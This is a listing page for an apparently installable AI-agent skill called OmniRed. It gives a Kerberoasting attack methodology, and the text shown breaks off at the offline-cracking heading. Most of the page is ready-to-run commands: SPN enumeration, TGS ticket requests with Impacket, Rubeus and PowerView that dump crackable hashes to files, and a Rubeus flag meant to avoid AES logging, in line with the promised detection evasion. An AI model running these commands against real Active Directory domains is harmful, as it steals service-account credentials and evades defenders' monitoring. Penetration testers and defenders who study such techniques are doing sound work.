kerberoastinglisted

Kerberoasting expert methodology — request TGS tickets for SPN-registered service accounts, extract, and crack offline. Covers enumeration, targeted attacks, AS-REP roasting, and detection evasion.
sunilgentyala/OmniRed · ★ 0 · AI & Automation · score 63

Install: claude install-skill sunilgentyala/OmniRed

# Kerberoasting ## Attack Surface Any domain-joined Windows environment where service accounts have Service Principal Names (SPNs) registered. Requires: valid domain credentials (any user). Service accounts often have weak passwords set long ago and rarely rotated. ## Methodology ### Phase 1 — Enumerate SPNs ```powershell # Native PowerShell Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName | Select-Object SamAccountName, ServicePrincipalName | Format-List # setspn (built-in) setspn -T domain.local -Q */* # LDAP query ([ADSISearcher]'(&(objectClass=user)(servicePrincipalName=*))').FindAll() | ForEach-Object { $_.Properties['samaccountname'] } ``` Target high-value accounts: svc_sql, svc_exchange, svc_backup, svc_iis, Administrator (if SPN set). ### Phase 2 — Request TGS tickets **Impacket (Linux):** ```bash impacket-GetUserSPNs domain.local/user:password -dc-ip 10.0.0.1 -request impacket-GetUserSPNs domain.local/user:password -dc-ip 10.0.0.1 -request -outputfile hashes.txt ``` **Rubeus (Windows, from domain-joined host):** ```powershell .\Rubeus.exe kerberoast /outfile:hashes.txt .\Rubeus.exe kerberoast /user:svc_sql /outfile:svc_sql_hash.txt # targeted .\Rubeus.exe kerberoast /rc4opsec # request only RC4 tickets (avoids AES logging) ``` **PowerView:** ```powershell Import-Module .\PowerView.ps1 Invoke-Kerberoast -OutputFormat HashCat | Select-Object Hash | Out-File hashes.txt ``` ### Phase 3 — Offline cracking ```bash